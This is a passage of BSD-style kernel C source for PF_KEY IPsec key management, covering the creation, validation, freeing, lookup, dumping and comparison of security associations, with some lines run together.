SAs. */ static void key_delsah(struct secashead *sah) { struct secasvar *sav, *nextsav; u_int stateidx; int nzombies = 0; /* sanity check */ if (sah == NULL) panic("key_delsah: NULL pointer is passed.\n"); crit_enter(); /* searching all SA registerd in the secindex. */ for (stateidx = 0; stateidx < NELEM(saorder_state_any); stateidx++) { u_int state = saorder_state_any[stateidx]; LIST_FOREACH_MUTABLE(sav, &sah->savtree[state], chain, nextsav) if (sav->refcnt == 0) { /* sanity check */ KEY_CHKSASTATE(state, sav->state, __func__); KEY_FREESAV(&sav); } else { /* give up to delete this SA */ nzombies++; } } /* Delete sah it has are no savs. */ if (nzombies == 0) { /* remove from tree of SA index */ if (__LIST_CHAINED(sah)) LIST_REMOVE(sah, chain); if (sah->sa_route.ro_rt) { RTFREE(sah->sa_route.ro_rt); sah->sa_route.ro_rt = NULL; } KFREE(sah); } crit_exit(); return; } /* * allocating a new SA with LARVAL state. key_add() and key_getspi() call, * and copy the values of mhp into new buffer. 
 * When SAD message type is GETSPI:
 *	to set sequence number from acq_seq++,
 *	to set zero to SPI.
 *	not to call key_setsava().
 * OUT:	NULL	: fail
 *	others	: pointer to new secasvar.
 *
 * does not modify mbuf.  does not free mbuf on error.
 */
static struct secasvar *
key_newsav(struct mbuf *m, const struct sadb_msghdr *mhp,
	   struct secashead *sah, int *errp,
	   const char *where, int tag)
{
	struct secasvar *newsav;
	const struct sadb_sa *xsa;

	/* sanity check */
	if (m == NULL || mhp == NULL || mhp->msg == NULL || sah == NULL)
		panic("key_newsa: NULL pointer is passed.\n");

	KMALLOC(newsav, struct secasvar *, sizeof(struct secasvar));
	if (newsav == NULL) {
		ipseclog((LOG_DEBUG, "key_newsa: No more memory.\n"));
		*errp = ENOBUFS;
		goto done;
	}
	bzero((caddr_t)newsav, sizeof(struct secasvar));

	/* SPI and sequence number depend on the request type. */
	switch (mhp->msg->sadb_msg_type) {
	case SADB_GETSPI:
		/* GETSPI: kernel will allocate the SPI later; start at 0. */
		newsav->spi = 0;

#ifdef IPSEC_DOSEQCHECK
		/* sync sequence number */
		if (mhp->msg->sadb_msg_seq == 0)
			/* acq_seq wraps from ~0 back to 1 */
			newsav->seq =
				(acq_seq = (acq_seq == ~0 ? 1 : ++acq_seq));
		else
#endif
			newsav->seq = mhp->msg->sadb_msg_seq;
		break;

	case SADB_ADD:
		/* ADD: the caller must supply the SA extension (with SPI). */
		/* sanity check */
		if (mhp->ext[SADB_EXT_SA] == NULL) {
			KFREE(newsav), newsav = NULL;
			ipseclog((LOG_DEBUG,
			    "key_newsa: invalid message is passed.\n"));
			*errp = EINVAL;
			goto done;
		}
		xsa = (const struct sadb_sa *)mhp->ext[SADB_EXT_SA];
		newsav->spi = xsa->sadb_sa_spi;
		newsav->seq = mhp->msg->sadb_msg_seq;
		break;
	default:
		KFREE(newsav), newsav = NULL;
		*errp = EINVAL;
		goto done;
	}

	/* copy sav values (keys, lifetimes, replay state) — GETSPI skips it */
	if (mhp->msg->sadb_msg_type != SADB_GETSPI) {
		*errp = key_setsaval(newsav, m, mhp);
		if (*errp) {
			KFREE(newsav), newsav = NULL;
			goto done;
		}
	}

	/* reset created */
	newsav->created = time_second;
	newsav->pid = mhp->msg->sadb_msg_pid;

	/* add to satree; new SAs always start in LARVAL state */
	newsav->sah = sah;
	newsav->refcnt = 1;
	newsav->state = SADB_SASTATE_LARVAL;
	LIST_INSERT_TAIL(&sah->savtree[SADB_SASTATE_LARVAL], newsav,
			secasvar, chain);
done:
	KEYDEBUG(KEYDEBUG_IPSEC_STAMP,
		kprintf("DP key_newsav from %s:%u return SP:%p\n",
			where, tag, newsav));

	return newsav;
}

/*
 * free() SA variable entry.
 */
static void
key_delsav(struct secasvar *sav)
{
	KASSERT(sav != NULL, ("key_delsav: null sav"));
	KASSERT(sav->refcnt == 0,
		("key_delsav: reference count %u > 0", sav->refcnt));

	/* remove from SA header */
	if (__LIST_CHAINED(sav))
		LIST_REMOVE(sav, chain);

	/*
	 * Cleanup xform state.  Note that zeroize'ing causes the
	 * keys to be cleared; otherwise we must do it ourself.
	 */
	if (sav->tdb_xform != NULL) {
		sav->tdb_xform->xf_zeroize(sav);
		sav->tdb_xform = NULL;
	} else {
		/* wipe key material before freeing it */
		if (sav->key_auth != NULL)
			bzero(_KEYBUF(sav->key_auth), _KEYLEN(sav->key_auth));
		if (sav->key_enc != NULL)
			bzero(_KEYBUF(sav->key_enc), _KEYLEN(sav->key_enc));
	}
	if (sav->key_auth != NULL) {
		KFREE(sav->key_auth);
		sav->key_auth = NULL;
	}
	if (sav->key_enc != NULL) {
		KFREE(sav->key_enc);
		sav->key_enc = NULL;
	}
	if (sav->sched) {
		/* expanded key schedule is also sensitive — zero first */
		bzero(sav->sched, sav->schedlen);
		KFREE(sav->sched);
		sav->sched = NULL;
	}
	if (sav->replay != NULL) {
		KFREE(sav->replay);
		sav->replay = NULL;
	}
	if (sav->lft_c != NULL) {
		KFREE(sav->lft_c);
		sav->lft_c = NULL;
	}
	if (sav->lft_h != NULL) {
		KFREE(sav->lft_h);
		sav->lft_h = NULL;
	}
	if (sav->lft_s != NULL) {
		KFREE(sav->lft_s);
		sav->lft_s = NULL;
	}
	if (sav->iv != NULL) {
		KFREE(sav->iv);
		sav->iv = NULL;
	}

	KFREE(sav);

	return;
}

/*
 * search SAD.
 * OUT:
 *	NULL	: not found
 *	others	: found, pointer to a SA.
 */
static struct secashead *
key_getsah(struct secasindex *saidx)
{
	struct secashead *sah;

	LIST_FOREACH(sah, &sahtree, chain) {
		if (sah->state == SADB_SASTATE_DEAD)
			continue;
		if (key_cmpsaidx(&sah->saidx, saidx, CMP_REQID))
			return sah;
	}

	return NULL;
}

/*
 * check not to be duplicated SPI.
 * NOTE: this function is too slow due to searching all SAD.
 * OUT:
 *	NULL	: not found
 *	others	: found, pointer to a SA.
*/ static struct secasvar * key_checkspidup(struct secasindex *saidx, u_int32_t spi) { struct secashead *sah; struct secasvar *sav; /* check address family */ if (saidx->src.sa.sa_family != saidx->dst.sa.sa_family) { ipseclog((LOG_DEBUG, "key_checkspidup: address family mismatched.\n")); return NULL; } /* check all SAD */ LIST_FOREACH(sah, &sahtree, chain) { if (!key_ismyaddr((struct sockaddr *)&sah->saidx.dst)) continue; sav = key_getsavbyspi(sah, spi); if (sav != NULL) return sav; } return NULL; } /* * search SAD litmited alive SA, protocol, SPI. * OUT: * NULL : not found * others : found, pointer to a SA. */ static struct secasvar * key_getsavbyspi(struct secashead *sah, u_int32_t spi) { struct secasvar *sav; u_int stateidx; /* search all status */ for (stateidx = 0; stateidx < NELEM(saorder_state_alive); stateidx++) { u_int state = saorder_state_alive[stateidx]; LIST_FOREACH(sav, &sah->savtree[state], chain) { /* sanity check */ if (sav->state != state) { ipseclog((LOG_DEBUG, "key_getsavbyspi: " "invalid sav->state (queue: %d SA: %d)\n", state, sav->state)); continue; } if (sav->spi == spi) return sav; } } return NULL; } /* * copy SA values from PF_KEY message except *SPI, SEQ, PID, STATE and TYPE*. * You must update these if need. * OUT: 0: success. * !0: failure. * * does not modify mbuf. does not free mbuf on error. 
 */
static int
key_setsaval(struct secasvar *sav, struct mbuf *m,
	     const struct sadb_msghdr *mhp)
{
	int error = 0;

	/* sanity check */
	if (m == NULL || mhp == NULL || mhp->msg == NULL)
		panic("key_setsaval: NULL pointer is passed.\n");

	/* initialization — all owned pointers NULL so 'fail:' can free safely */
	sav->replay = NULL;
	sav->key_auth = NULL;
	sav->key_enc = NULL;
	sav->sched = NULL;
	sav->schedlen = 0;
	sav->iv = NULL;
	sav->lft_c = NULL;
	sav->lft_h = NULL;
	sav->lft_s = NULL;
	sav->tdb_xform = NULL;		/* transform */
	sav->tdb_encalgxform = NULL;	/* encoding algorithm */
	sav->tdb_authalgxform = NULL;	/* authentication algorithm */
	sav->tdb_compalgxform = NULL;	/* compression algorithm */

	/* SA */
	if (mhp->ext[SADB_EXT_SA] != NULL) {
		const struct sadb_sa *sa0;

		sa0 = (const struct sadb_sa *)mhp->ext[SADB_EXT_SA];
		if (mhp->extlen[SADB_EXT_SA] < sizeof(*sa0)) {
			error = EINVAL;
			goto fail;
		}

		sav->alg_auth = sa0->sadb_sa_auth;
		sav->alg_enc = sa0->sadb_sa_encrypt;
		sav->flags = sa0->sadb_sa_flags;

		/* replay window — only for new-style (non-OLD) SAs */
		if ((sa0->sadb_sa_flags & SADB_X_EXT_OLD) == 0) {
			/* one allocation: struct followed by the bitmap */
			sav->replay = kmalloc(sizeof(struct secreplay)+sa0->sadb_sa_replay, M_SECA, M_INTWAIT | M_ZERO | M_NULLOK);
			if (sav->replay == NULL) {
				ipseclog((LOG_DEBUG,
				    "key_setsaval: No more memory.\n"));
				error = ENOBUFS;
				goto fail;
			}
			if (sa0->sadb_sa_replay != 0)
				sav->replay->bitmap = (caddr_t)(sav->replay+1);
			sav->replay->wsize = sa0->sadb_sa_replay;
		}
	}

	/* Authentication keys */
	if (mhp->ext[SADB_EXT_KEY_AUTH] != NULL) {
		const struct sadb_key *key0;
		int len;

		key0 = (const struct sadb_key *)mhp->ext[SADB_EXT_KEY_AUTH];
		len = mhp->extlen[SADB_EXT_KEY_AUTH];

		error = 0;
		if (len < sizeof(*key0)) {
			error = EINVAL;
			goto fail;
		}
		switch (mhp->msg->sadb_msg_satype) {
		case SADB_SATYPE_AH:
		case SADB_SATYPE_ESP:
			/* zero-length key only valid with the NULL auth alg */
			if (len == PFKEY_ALIGN8(sizeof(struct sadb_key)) &&
			    sav->alg_auth != SADB_X_AALG_NULL)
				error = EINVAL;
			break;
		case SADB_X_SATYPE_IPCOMP:
		default:
			error = EINVAL;
			break;
		}
		if (error) {
			ipseclog((LOG_DEBUG,
			    "key_setsaval: invalid key_auth values.\n"));
			goto fail;
		}

		sav->key_auth = (struct sadb_key *)key_newbuf(key0, len);
		if (sav->key_auth == NULL) {
			ipseclog((LOG_DEBUG,
			    "key_setsaval: No more memory.\n"));
			error = ENOBUFS;
			goto fail;
		}
	}

	/* Encryption key */
	if (mhp->ext[SADB_EXT_KEY_ENCRYPT] != NULL) {
		const struct sadb_key *key0;
		int len;

		key0 = (const struct sadb_key *)mhp->ext[SADB_EXT_KEY_ENCRYPT];
		len = mhp->extlen[SADB_EXT_KEY_ENCRYPT];

		error = 0;
		if (len < sizeof(*key0)) {
			error = EINVAL;
			goto fail;
		}
		switch (mhp->msg->sadb_msg_satype) {
		case SADB_SATYPE_ESP:
			/* zero-length key only valid with the NULL enc alg */
			if (len == PFKEY_ALIGN8(sizeof(struct sadb_key)) &&
			    sav->alg_enc != SADB_EALG_NULL) {
				error = EINVAL;
				break;
			}
			sav->key_enc = (struct sadb_key *)key_newbuf(key0, len);
			if (sav->key_enc == NULL) {
				ipseclog((LOG_DEBUG,
				    "key_setsaval: No more memory.\n"));
				error = ENOBUFS;
				goto fail;
			}
			break;
		case SADB_X_SATYPE_IPCOMP:
			/* IPcomp takes no key; extension must be header-only */
			if (len != PFKEY_ALIGN8(sizeof(struct sadb_key)))
				error = EINVAL;
			sav->key_enc = NULL;	/*just in case*/
			break;
		case SADB_SATYPE_AH:
		default:
			error = EINVAL;
			break;
		}
		if (error) {
			/* NOTE(review): "key_setsatval" typo is in the
			 * original log string; kept as-is (runtime text). */
			ipseclog((LOG_DEBUG,
			    "key_setsatval: invalid key_enc value.\n"));
			goto fail;
		}
	}

	/* set iv */
	sav->ivlen = 0;

	/* hand the SA to the matching xform for algorithm setup */
	switch (mhp->msg->sadb_msg_satype) {
	case SADB_SATYPE_AH:
		error = xform_init(sav, XF_AH);
		break;
	case SADB_SATYPE_ESP:
		error = xform_init(sav, XF_ESP);
		break;
	case SADB_X_SATYPE_IPCOMP:
		error = xform_init(sav, XF_IPCOMP);
		break;
	}
	if (error) {
		ipseclog((LOG_DEBUG,
		    "key_setsaval: unable to initialize SA type %u.\n",
		    mhp->msg->sadb_msg_satype));
		goto fail;
	}

	/* reset created */
	sav->created = time_second;

	/* make lifetime for CURRENT */
	KMALLOC(sav->lft_c, struct sadb_lifetime *,
	    sizeof(struct sadb_lifetime));
	if (sav->lft_c == NULL) {
		ipseclog((LOG_DEBUG, "key_setsaval: No more memory.\n"));
		error = ENOBUFS;
		goto fail;
	}

	sav->lft_c->sadb_lifetime_len =
	    PFKEY_UNIT64(sizeof(struct sadb_lifetime));
	sav->lft_c->sadb_lifetime_exttype = SADB_EXT_LIFETIME_CURRENT;
	sav->lft_c->sadb_lifetime_allocations = 0;
	sav->lft_c->sadb_lifetime_bytes = 0;
	sav->lft_c->sadb_lifetime_addtime = time_second;
	sav->lft_c->sadb_lifetime_usetime = 0;

	/* lifetimes for HARD and SOFT */
    {
	const struct sadb_lifetime *lft0;

	lft0 = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_HARD];
	if (lft0 != NULL) {
		if (mhp->extlen[SADB_EXT_LIFETIME_HARD] < sizeof(*lft0)) {
			error = EINVAL;
			goto fail;
		}
		sav->lft_h = (struct sadb_lifetime *)key_newbuf(lft0,
		    sizeof(*lft0));
		if (sav->lft_h == NULL) {
			ipseclog((LOG_DEBUG,
			    "key_setsaval: No more memory.\n"));
			error = ENOBUFS;
			goto fail;
		}
		/* to be initialize ? */
	}

	lft0 = (struct sadb_lifetime *)mhp->ext[SADB_EXT_LIFETIME_SOFT];
	if (lft0 != NULL) {
		if (mhp->extlen[SADB_EXT_LIFETIME_SOFT] < sizeof(*lft0)) {
			error = EINVAL;
			goto fail;
		}
		sav->lft_s = (struct sadb_lifetime *)key_newbuf(lft0,
		    sizeof(*lft0));
		if (sav->lft_s == NULL) {
			ipseclog((LOG_DEBUG,
			    "key_setsaval: No more memory.\n"));
			error = ENOBUFS;
			goto fail;
		}
		/* to be initialize ? */
	}
    }

	return 0;

 fail:
	/* initialization — release everything allocated above */
	if (sav->replay != NULL) {
		KFREE(sav->replay);
		sav->replay = NULL;
	}
	if (sav->key_auth != NULL) {
		KFREE(sav->key_auth);
		sav->key_auth = NULL;
	}
	if (sav->key_enc != NULL) {
		KFREE(sav->key_enc);
		sav->key_enc = NULL;
	}
	if (sav->sched) {
		KFREE(sav->sched);
		sav->sched = NULL;
	}
	if (sav->iv != NULL) {
		KFREE(sav->iv);
		sav->iv = NULL;
	}
	if (sav->lft_c != NULL) {
		KFREE(sav->lft_c);
		sav->lft_c = NULL;
	}
	if (sav->lft_h != NULL) {
		KFREE(sav->lft_h);
		sav->lft_h = NULL;
	}
	if (sav->lft_s != NULL) {
		KFREE(sav->lft_s);
		sav->lft_s = NULL;
	}

	return error;
}

/*
 * validation with a secasvar entry, and set SADB_SATYPE_MATURE.
* OUT: 0: valid * other: errno */ static int key_mature(struct secasvar *sav) { int error; /* check SPI value */ switch (sav->sah->saidx.proto) { case IPPROTO_ESP: case IPPROTO_AH: if (ntohl(sav->spi) >= 0 && ntohl(sav->spi) <= 255) { ipseclog((LOG_DEBUG, "key_mature: illegal range of SPI %u.\n", (u_int32_t)ntohl(sav->spi))); return EINVAL; } break; } /* check satype */ switch (sav->sah->saidx.proto) { case IPPROTO_ESP: /* check flags */ if ((sav->flags & (SADB_X_EXT_OLD|SADB_X_EXT_DERIV)) == (SADB_X_EXT_OLD|SADB_X_EXT_DERIV)) { ipseclog((LOG_DEBUG, "key_mature: " "invalid flag (derived) given to old-esp.\n")); return EINVAL; } error = xform_init(sav, XF_ESP); break; case IPPROTO_AH: /* check flags */ if (sav->flags & SADB_X_EXT_DERIV) { ipseclog((LOG_DEBUG, "key_mature: " "invalid flag (derived) given to AH SA.\n")); return EINVAL; } if (sav->alg_enc != SADB_EALG_NONE) { ipseclog((LOG_DEBUG, "key_mature: " "protocol and algorithm mismated.\n")); return(EINVAL); } error = xform_init(sav, XF_AH); break; case IPPROTO_IPCOMP: if (sav->alg_auth != SADB_AALG_NONE) { ipseclog((LOG_DEBUG, "key_mature: " "protocol and algorithm mismated.\n")); return(EINVAL); } if ((sav->flags & SADB_X_EXT_RAWCPI) == 0 && ntohl(sav->spi) >= 0x10000) { ipseclog((LOG_DEBUG, "key_mature: invalid cpi for IPComp.\n")); return(EINVAL); } error = xform_init(sav, XF_IPCOMP); break; default: ipseclog((LOG_DEBUG, "key_mature: Invalid satype.\n")); error = EPROTONOSUPPORT; break; } if (error == 0) key_sa_chgstate(sav, SADB_SASTATE_MATURE); return (error); } /* * subroutine for SADB_GET and SADB_DUMP. 
 */
static struct mbuf *
key_setdumpsa(struct secasvar *sav, u_int8_t type, u_int8_t satype,
	      u_int32_t seq, u_int32_t pid)
{
	struct mbuf *result = NULL, *tres = NULL, *m;
	int l = 0;
	int i;
	void *p;
	/* extensions are emitted in this order; iterated in REVERSE below */
	int dumporder[] = {
		SADB_EXT_SA, SADB_X_EXT_SA2,
		SADB_EXT_LIFETIME_HARD, SADB_EXT_LIFETIME_SOFT,
		SADB_EXT_LIFETIME_CURRENT, SADB_EXT_ADDRESS_SRC,
		SADB_EXT_ADDRESS_DST, SADB_EXT_ADDRESS_PROXY, SADB_EXT_KEY_AUTH,
		SADB_EXT_KEY_ENCRYPT, SADB_EXT_IDENTITY_SRC,
		SADB_EXT_IDENTITY_DST, SADB_EXT_SENSITIVITY,
	};

	m = key_setsadbmsg(type, 0, satype, seq, pid, sav->refcnt);
	if (m == NULL)
		goto fail;
	result = m;

	/*
	 * Walk dumporder backwards, building tres front-to-back:
	 * each raw buffer (p) is M_PREPENDed, each built mbuf (m)
	 * gets tres appended — so the final chain is in dump order.
	 */
	for (i = NELEM(dumporder) - 1; i >= 0; i--) {
		m = NULL;
		p = NULL;
		switch (dumporder[i]) {
		case SADB_EXT_SA:
			m = key_setsadbsa(sav);
			if (!m)
				goto fail;
			break;

		case SADB_X_EXT_SA2:
			m = key_setsadbxsa2(sav->sah->saidx.mode,
					sav->replay ? sav->replay->count : 0,
					sav->sah->saidx.reqid);
			if (!m)
				goto fail;
			break;

		case SADB_EXT_ADDRESS_SRC:
			m = key_setsadbaddr(SADB_EXT_ADDRESS_SRC,
			    &sav->sah->saidx.src.sa,
			    FULLMASK, IPSEC_ULPROTO_ANY);
			if (!m)
				goto fail;
			break;

		case SADB_EXT_ADDRESS_DST:
			m = key_setsadbaddr(SADB_EXT_ADDRESS_DST,
			    &sav->sah->saidx.dst.sa,
			    FULLMASK, IPSEC_ULPROTO_ANY);
			if (!m)
				goto fail;
			break;

		case SADB_EXT_KEY_AUTH:
			if (!sav->key_auth)
				continue;
			l = PFKEY_UNUNIT64(sav->key_auth->sadb_key_len);
			p = sav->key_auth;
			break;

		case SADB_EXT_KEY_ENCRYPT:
			if (!sav->key_enc)
				continue;
			l = PFKEY_UNUNIT64(sav->key_enc->sadb_key_len);
			p = sav->key_enc;
			break;

		case SADB_EXT_LIFETIME_CURRENT:
			if (!sav->lft_c)
				continue;
			l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_c)->sadb_ext_len);
			p = sav->lft_c;
			break;

		case SADB_EXT_LIFETIME_HARD:
			if (!sav->lft_h)
				continue;
			l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_h)->sadb_ext_len);
			p = sav->lft_h;
			break;

		case SADB_EXT_LIFETIME_SOFT:
			if (!sav->lft_s)
				continue;
			l = PFKEY_UNUNIT64(((struct sadb_ext *)sav->lft_s)->sadb_ext_len);
			p = sav->lft_s;
			break;

		case SADB_EXT_ADDRESS_PROXY:
		case SADB_EXT_IDENTITY_SRC:
		case SADB_EXT_IDENTITY_DST:
			/* XXX: should we brought from SPD ? */
		case SADB_EXT_SENSITIVITY:
		default:
			continue;
		}

		/* exactly one of m / p must have been produced */
		if ((!m && !p) || (m && p))
			goto fail;
		if (p && tres) {
			M_PREPEND(tres, l, MB_DONTWAIT);
			if (!tres)
				goto fail;
			bcopy(p, mtod(tres, caddr_t), l);
			continue;
		}
		if (p) {
			m = key_alloc_mbuf(l);
			if (!m)
				goto fail;
			m_copyback(m, 0, l, p);
		}

		if (tres)
			m_cat(m, tres);
		tres = m;
	}

	m_cat(result, tres);

	if (result->m_len < sizeof(struct sadb_msg)) {
		result = m_pullup(result, sizeof(struct sadb_msg));
		if (result == NULL)
			goto fail;
	}

	result->m_pkthdr.len = m_lengthm(result, NULL);

	mtod(result, struct sadb_msg *)->sadb_msg_len =
	    PFKEY_UNIT64(result->m_pkthdr.len);

	return result;

fail:
	m_freem(result);
	m_freem(tres);
	return NULL;
}

/*
 * set data into sadb_msg.
 */
static struct mbuf *
key_setsadbmsg(u_int8_t type, u_int16_t tlen, u_int8_t satype,
	       u_int32_t seq, pid_t pid, u_int16_t reserved)
{
	struct mbuf *m;
	struct sadb_msg *p;
	int len;

	len = PFKEY_ALIGN8(sizeof(struct sadb_msg));
	if (len > MCLBYTES)
		return NULL;
	m = m_getb(len, MB_DONTWAIT, MT_DATA, M_PKTHDR);
	if (!m)
		return NULL;
	m->m_pkthdr.len = m->m_len = len;

	p = mtod(m, struct sadb_msg *);

	bzero(p, len);
	p->sadb_msg_version = PF_KEY_V2;
	p->sadb_msg_type = type;
	p->sadb_msg_errno = 0;
	p->sadb_msg_satype = satype;
	p->sadb_msg_len = PFKEY_UNIT64(tlen);
	p->sadb_msg_reserved = reserved;
	p->sadb_msg_seq = seq;
	p->sadb_msg_pid = (u_int32_t)pid;

	return m;
}

/*
 * copy secasvar data into sadb_address.
 */
static struct mbuf *
key_setsadbsa(struct secasvar *sav)
{
	struct mbuf *m;
	struct sadb_sa *p;
	int len;

	len = PFKEY_ALIGN8(sizeof(struct sadb_sa));
	m = key_alloc_mbuf(len);
	if (!m || m->m_next) {	/*XXX*/
		if (m)
			m_freem(m);
		return NULL;
	}

	p = mtod(m, struct sadb_sa *);

	bzero(p, len);
	p->sadb_sa_len = PFKEY_UNIT64(len);
	p->sadb_sa_exttype = SADB_EXT_SA;
	p->sadb_sa_spi = sav->spi;
	p->sadb_sa_replay = (sav->replay != NULL ? sav->replay->wsize : 0);
	p->sadb_sa_state = sav->state;
	p->sadb_sa_auth = sav->alg_auth;
	p->sadb_sa_encrypt = sav->alg_enc;
	p->sadb_sa_flags = sav->flags;

	return m;
}

/*
 * set data into sadb_address.
 */
static struct mbuf *
key_setsadbaddr(u_int16_t exttype, const struct sockaddr *saddr,
		u_int8_t prefixlen, u_int16_t ul_proto)
{
	struct mbuf *m;
	struct sadb_address *p;
	size_t len;

	len = PFKEY_ALIGN8(sizeof(struct sadb_address)) +
	    PFKEY_ALIGN8(saddr->sa_len);
	m = key_alloc_mbuf(len);
	if (!m || m->m_next) {	/*XXX*/
		if (m)
			m_freem(m);
		return NULL;
	}

	p = mtod(m, struct sadb_address *);

	bzero(p, len);
	p->sadb_address_len = PFKEY_UNIT64(len);
	p->sadb_address_exttype = exttype;
	p->sadb_address_proto = ul_proto;
	/* FULLMASK is expanded to the family's full prefix length in bits */
	if (prefixlen == FULLMASK) {
		switch (saddr->sa_family) {
		case AF_INET:
			prefixlen = sizeof(struct in_addr) << 3;
			break;
		case AF_INET6:
			prefixlen = sizeof(struct in6_addr) << 3;
			break;
		default:
			; /*XXX*/
		}
	}
	p->sadb_address_prefixlen = prefixlen;
	p->sadb_address_reserved = 0;

	bcopy(saddr,
	    mtod(m, caddr_t) + PFKEY_ALIGN8(sizeof(struct sadb_address)),
	    saddr->sa_len);

	return m;
}

#if 0
/*
 * set data into sadb_ident.
 */
static struct mbuf *
key_setsadbident(u_int16_t exttype, u_int16_t idtype,
		 caddr_t string, int stringlen, u_int64_t id)
{
	struct mbuf *m;
	struct sadb_ident *p;
	size_t len;

	len = PFKEY_ALIGN8(sizeof(struct sadb_ident)) +
	    PFKEY_ALIGN8(stringlen);
	m = key_alloc_mbuf(len);
	if (!m || m->m_next) {	/*XXX*/
		if (m)
			m_freem(m);
		return NULL;
	}

	p = mtod(m, struct sadb_ident *);

	bzero(p, len);
	p->sadb_ident_len = PFKEY_UNIT64(len);
	p->sadb_ident_exttype = exttype;
	p->sadb_ident_type = idtype;
	p->sadb_ident_reserved = 0;
	p->sadb_ident_id = id;

	bcopy(string,
	    mtod(m, caddr_t) + PFKEY_ALIGN8(sizeof(struct sadb_ident)),
	    stringlen);

	return m;
}
#endif

/*
 * set data into sadb_x_sa2.
*/ static struct mbuf * key_setsadbxsa2(u_int8_t mode, u_int32_t seq, u_int32_t reqid) { struct mbuf *m; struct sadb_x_sa2 *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_x_sa2)); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_x_sa2 *); bzero(p, len); p->sadb_x_sa2_len = PFKEY_UNIT64(len); p->sadb_x_sa2_exttype = SADB_X_EXT_SA2; p->sadb_x_sa2_mode = mode; p->sadb_x_sa2_reserved1 = 0; p->sadb_x_sa2_reserved2 = 0; p->sadb_x_sa2_sequence = seq; p->sadb_x_sa2_reqid = reqid; return m; } /* * set data into sadb_x_policy */ static struct mbuf * key_setsadbxpolicy(u_int16_t type, u_int8_t dir, u_int32_t id) { struct mbuf *m; struct sadb_x_policy *p; size_t len; len = PFKEY_ALIGN8(sizeof(struct sadb_x_policy)); m = key_alloc_mbuf(len); if (!m || m->m_next) { /*XXX*/ if (m) m_freem(m); return NULL; } p = mtod(m, struct sadb_x_policy *); bzero(p, len); p->sadb_x_policy_len = PFKEY_UNIT64(len); p->sadb_x_policy_exttype = SADB_X_EXT_POLICY; p->sadb_x_policy_type = type; p->sadb_x_policy_dir = dir; p->sadb_x_policy_id = id; return m; } /* %%% utilities */ /* * copy a buffer into the new buffer allocated. */ static void * key_newbuf(const void *src, u_int len) { caddr_t new; KMALLOC(new, caddr_t, len); if (new == NULL) { ipseclog((LOG_DEBUG, "key_newbuf: No more memory.\n")); return NULL; } bcopy(src, new, len); return new; } /* compare my own address * OUT: 1: true, i.e. my address. 
* 0: false */ int key_ismyaddr(struct sockaddr *sa) { #ifdef INET struct sockaddr_in *sin; struct in_ifaddr_container *iac; #endif /* sanity check */ if (sa == NULL) panic("key_ismyaddr: NULL pointer is passed.\n"); switch (sa->sa_family) { #ifdef INET case AF_INET: sin = (struct sockaddr_in *)sa; TAILQ_FOREACH(iac, &in_ifaddrheads[mycpuid], ia_link) { struct in_ifaddr *ia = iac->ia; if (sin->sin_family == ia->ia_addr.sin_family && sin->sin_len == ia->ia_addr.sin_len && sin->sin_addr.s_addr == ia->ia_addr.sin_addr.s_addr) { return 1; } } break; #endif #ifdef INET6 case AF_INET6: return key_ismyaddr6((struct sockaddr_in6 *)sa); #endif } return 0; } #ifdef INET6 /* * compare my own address for IPv6. * 1: ours * 0: other * NOTE: derived ip6_input() in KAME. This is necessary to modify more. */ #include <netinet6/in6_var.h> static int key_ismyaddr6(struct sockaddr_in6 *sin6) { struct in6_ifaddr *ia; struct in6_multi *in6m; for (ia = in6_ifaddr; ia; ia = ia->ia_next) { if (key_sockaddrcmp((struct sockaddr *)&sin6, (struct sockaddr *)&ia->ia_addr, 0) == 0) return 1; /* * XXX Multicast * XXX why do we care about multlicast here while we don't care * about IPv4 multicast?? * XXX scope */ in6m = NULL; IN6_LOOKUP_MULTI(sin6->sin6_addr, ia->ia_ifp, in6m); if (in6m) return 1; } /* loopback, just for safety */ if (IN6_IS_ADDR_LOOPBACK(&sin6->sin6_addr)) return 1; return 0; } #endif /*INET6*/ /* * compare two secasindex structure. * flag can specify to compare 2 saidxes. * compare two secasindex structure without both mode and reqid. * don't compare port. * IN: * saidx0: source, it can be in SAD. * saidx1: object. 
 * OUT:
 *	1 : equal
 *	0 : not equal
 */
/*
 * key_cmpsaidx: compare two SA indices under the policy selected by `flag':
 *   CMP_EXACTLY    - mode, reqid and raw src/dst sockaddrs must all match.
 *   CMP_MODE_REQID - reqid (if saidx1 requests one) and mode (unless
 *                    saidx0 is IPSEC_MODE_ANY) must match, addresses
 *                    compared without ports.
 *   CMP_REQID      - like CMP_MODE_REQID but mode is ignored.
 *   CMP_HEAD       - addresses only (without ports).
 * Returns 1 on match, 0 otherwise.  Two NULLs compare equal.
 */
static int
key_cmpsaidx(
	const struct secasindex *saidx0,
	const struct secasindex *saidx1,
	int flag)
{
	/* sanity */
	if (saidx0 == NULL && saidx1 == NULL)
		return 1;

	if (saidx0 == NULL || saidx1 == NULL)
		return 0;

	if (saidx0->proto != saidx1->proto)
		return 0;

	if (flag == CMP_EXACTLY) {
		if (saidx0->mode != saidx1->mode)
			return 0;

		if (saidx0->reqid != saidx1->reqid)
			return 0;

		/* raw byte compare, includes ports and everything else */
		if (bcmp(&saidx0->src, &saidx1->src, saidx0->src.sa.sa_len) != 0 ||
		    bcmp(&saidx0->dst, &saidx1->dst, saidx0->dst.sa.sa_len) != 0)
			return 0;
	} else {
		/* CMP_MODE_REQID, CMP_REQID, CMP_HEAD */
		if (flag == CMP_MODE_REQID ||flag == CMP_REQID) {
			/*
			 * If reqid of SPD is non-zero, unique SA is required.
			 * The result must be of same reqid in this case.
			 */
			if (saidx1->reqid != 0 && saidx0->reqid != saidx1->reqid)
				return 0;
		}

		if (flag == CMP_MODE_REQID) {
			if (saidx0->mode != IPSEC_MODE_ANY &&
			    saidx0->mode != saidx1->mode)
				return 0;
		}

		/* key_sockaddrcmp(..., 0): ports intentionally ignored */
		if (key_sockaddrcmp(&saidx0->src.sa, &saidx1->src.sa, 0) != 0) {
			return 0;
		}
		if (key_sockaddrcmp(&saidx0->dst.sa, &saidx1->dst.sa, 0) != 0) {
			return 0;
		}
	}

	return 1;
}

/*
 * compare two secindex structure exactly.
 * IN:
 *	spidx0: source, it is often in SPD.
 *	spidx1: object, it is often from PFKEY message.
 * OUT:
 *	1 : equal
 *	0 : not equal
 */
static int
key_cmpspidx_exactly(
	struct secpolicyindex *spidx0,
